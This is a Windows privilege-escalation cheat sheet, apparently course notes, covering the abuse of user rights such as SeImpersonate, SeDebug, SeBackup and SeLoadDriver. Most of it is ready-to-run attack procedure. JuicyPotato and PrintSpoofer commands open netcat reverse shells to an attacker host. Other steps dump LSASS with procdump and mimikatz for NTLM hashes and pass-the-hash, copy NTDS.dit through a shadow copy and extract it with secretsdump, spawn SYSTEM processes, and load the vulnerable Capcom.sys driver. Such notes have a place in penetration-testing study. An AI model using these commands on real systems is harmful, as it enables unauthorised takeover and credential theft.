Excessive User Rights Abuse

Disclaimer - Disabled Rights

• User privileges can be assigned but disabled.

• Some of them can be re-enabled using scripts or commands depending on the privilege.

SeImpersonate & SeAssignPrimaryToken - JuicyPotato & Printspoofer

• These privileges can be used to trick a process running as SYSTEM to connect to the exploit process, handing over the token to be used.

• In other words, whenever a user has one of these privileges, it's possible to get privilege escalation by impersonating NT AUTHORITY\SYSTEM

Escalating Privileges with JuicyPotato

1. Download juicypotato and nc.exe on the target machine

2. Check CLSIDs:

   1. Use systeminfo to get the OS version

   2. Select the right list according to the OS Version from Juicy Potato CLSIDs

   3. Download the test_clsid.bat file from the JuicyPotato GitHub

   4. Run test_clsid.bat and wait, then check the result.log file

   5. Inside that log file you will find different CLSIDs.

   6. Look for a CLSID with SYSTEM privileges

3. Start a netcat listener on the attacker machine: nc -lvnp 4444

4. Run JuicyPotato: .\juicypotato.exe -l SAMEPORT -c CLSID_SYSTEM_FROM_RESULTS -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe attacker-ip SAME-LISTENING-PORT" -t *

5. Disclaimer/Troubleshooting: the listening netcat port and the port specified after the -l flag need to be the same in order to get the reverse shell

---

Escalating Privileges with PrintSpoofer

• JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards.

• PrintSpoofer and RoguePotato can be used on them to leverage the same privileges and gain NT AUTHORITY\SYSTEM level access.

• We can use the tool to spawn a SYSTEM process in the current console, spawn a SYSTEM process on a desktop (if logged on locally or via RDP), or catch a reverse shell

• PoC to get a Reverse Shell:

  1. Download printspoofer.exe and nc.exe on the target machine

  2. Start a netcat listener on the attacker machine: nc -lvnp 4444

  3. Run PrintSpoofer: PrintSpoofer.exe -c "c:\tools\nc.exe attacker-ip netcat-port -e cmd"

---

SeDebugPrivilege

• SeDebugPrivilege determines which users can attach to or open any process, even a process they do not own.

• Developers who are debugging their applications DO NOT need this user right.

• Developers who are debugging new system components need this user right.

• This user right provides access to sensitive and critical operating system components.

• This user right can be used to capture sensitive information from system memory, or access/modify kernel and application structures

• Sometimes, developer users are assigned the debugprivilege rather than being added to the administrators group, who have this privilege by default

SeDebugPrivilege to Dump LSASS

1. Use ProcDump to extract a dump of the LSASS process: procdump.exe -accepteula -ma lsass.exe lsass.dmp

2. Using mimikatz.exe:

   • sekurlsa::minidump

   • sekurlsa::logonPasswords

   • Gain the NTLM Hashes to use for a Pass the Hash attack or to crack them

---

SeDebugPrivilege to gain Remote Code Execution as SYSTEM

1. Get this PoC Script on the target system
2. Open an elevated powershell console (e.g. right click on PS and run as admin)

3. Run tasklist and look for a privileged process (e.g. winlogon.exe) and get its PID

4. Run the script: .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>,"")

5. Alternatively:

   1. Import-Module .\psgetsys.ps1

   2. ImpersonateFromParentPid -ppid (Get-Process "lsass").Id -command "C:\tools\revshell.exe"

---

SeTakeOwnershipPrivilege

SeTakeOwnershipPrivilege is a policy setting that determines which users can take ownership of any securable object

• Check target file current ownership

  • PowerShell: Get-ChildItem -Path 'C:\Path\to\file.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }

  • CMD: cmd /c dir /q 'C:\Path\to\file.txt'

  • Disclaimer: Sometimes the owner won't show due to lack of permissions

• To take ownership of a file: takeown /f 'C:\Path\to\file.txt'

• To enable full permissions on a file: icacls 'C:\Path\to\file.txt' /grant htb-student:F

---

SeBackupPrivilege

• A user with SeBackupPrivilege enabled can bypass file and directory, registry, and other persistent object permissions for the purposes of backing up the system.

• This will let us copy a file from a folder, bypassing any access control list (ACL).

• However, we can't do this using the standard copy command.

• Instead, we need to programmatically copy the data, making sure to specify the FILE_FLAG_BACKUP_SEMANTICS flag.

• We can use the built-in robocopy tool or the following PoC to copy any file: https://github.com/giuliano108/SeBackupPrivilege

---

SeBackupPrivilege to Copy any file

1. Import-Module .\SeBackupPrivilegeUtils.dll

2. Import-Module .\SeBackupPrivilegeCmdLets.dll

3. If the privilege is assigned but disabled, use Set-SeBackupPrivilege and verify with Get-SeBackupPrivilege

4. Copy a file: Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt

---

SeBackupPrivilege to Copy any file with robocopy [Built-in Utility]

• Robocopy is a built-in utility that can be used to copy files in backup mode.

• No external tools are required

• robocopy /B E:\Windows\NTDS .\ntds ntds.dit

---

SeBackupPrivilege to copy NTDS.dit

• The NTDS.dit file is locked by default

• We can use the Windows diskshadow utility to create a shadow copy of the C drive and expose it as E drive.

• The NTDS.dit in this shadow copy won't be in use by the system.

• Then, we can use the Copy-FileSeBackupPrivilege cmdlet to bypass the ACL and copy the NTDS.dit locally.

Follow these steps:

1. Import-Module .\SeBackupPrivilegeUtils.dll

2. Import-Module .\SeBackupPrivilegeCmdLets.dll

3. If the privilege is assigned but disabled, use Set-SeBackupPrivilege and verify with Get-SeBackupPrivilege

4. Copy the NTDS file: Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit

5. Extract hashes using SecretsDump: secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

---

SeLoadDriverPrivilege

• This policy setting determines which users can dynamically load and unload device drivers.

• This user right is not required if a signed driver for the new hardware already exists in the driver.cab file on the device

• Device drivers run as highly privileged code.

Example - Capcom.sys

• A typically vulnerable driver to this attack is Capcom.sys, which can allow any user to execute shellcode with SYSTEM privileges

• Download on the target machine: Capcom.sys file
• Download EopLoadDriver and transfer on the target machine: EopLoadDriver
• PoC Usage: EOPLOADDRIVER.exe RegistryServicePath DriverImagePath

• PoC Usage with CapCom.sys: EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\path-to-downloaded\Capcom.sys

---

SeSecurityPrivilege

• This policy setting determines which users can specify object access audit options for individual resources such as files, Active Directory objects, and registry keys.

• These objects specify their system access control lists (SACL).

• A user assigned this user right can also view and clear the Security log in Event Viewer.

---

SeRestorePrivilege

• This security setting determines which users can bypass file, directory, registry, and other persistent object permissions when they restore backed up files and directories.

• It determines which users can set valid security principals as the owner of an object.